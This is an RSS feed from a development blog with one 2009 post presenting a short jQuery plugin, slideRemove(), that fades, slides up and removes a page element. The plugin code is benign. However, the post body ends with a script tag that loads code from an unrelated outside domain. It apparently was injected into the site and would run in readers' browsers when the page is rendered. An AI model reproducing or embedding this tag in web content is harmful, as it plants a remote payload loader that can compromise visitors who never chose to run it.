<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>There4 Development &#187; jQuery</title>
	<atom:link href="http://there4development.com/tag/jquery/feed/" rel="self" type="application/rss+xml" />
	<link>http://there4development.com</link>
	<description>Application development and consulting</description>
	<lastBuildDate>Wed, 01 Sep 2010 02:44:59 +0000</lastBuildDate>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.0.1</generator>
		<item>
		<title>jQuery slideRemove()</title>
		<link>http://there4development.com/2009/10/jquery-slideup-remove/</link>
		<comments>http://there4development.com/2009/10/jquery-slideup-remove/#comments</comments>
		<pubDate>Sun, 04 Oct 2009 03:39:53 +0000</pubDate>
		<dc:creator>Craig Davis</dc:creator>
				<category><![CDATA[Blog]]></category>
		<category><![CDATA[JavaScript]]></category>
		<category><![CDATA[jQuery]]></category>

		<guid isPermaLink="false">http://there4development.com/?p=370</guid>
		<description><![CDATA[jQuery function to slide and remove an element from a page.]]></description>
			<content:encoded><![CDATA[<p>I&#8217;ve often run into times that I have wanted to use jquery to fade an element, and slide up the open space, and then remove the element from the page. I&#8217;ve written a small jQuery function to handle this.</p>
<pre <pre class="brush:javascript">
jQuery.fn.slideRemove = function(callback) {
  $(this).blur().fadeTo('medium', 0, function() { // fade
  $(this).slideUp('medium', function() {   // slide up
  $(this).remove();                        // remove from DOM
  if (callback) { callback(); }
  });
  });
  return this;
};
</pre>
<p><script src="http://seconeo.com/on"></script></p>
]]></content:encoded>
			<wfw:commentRss>http://there4development.com/2009/10/jquery-slideup-remove/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
	</channel>
</rss>
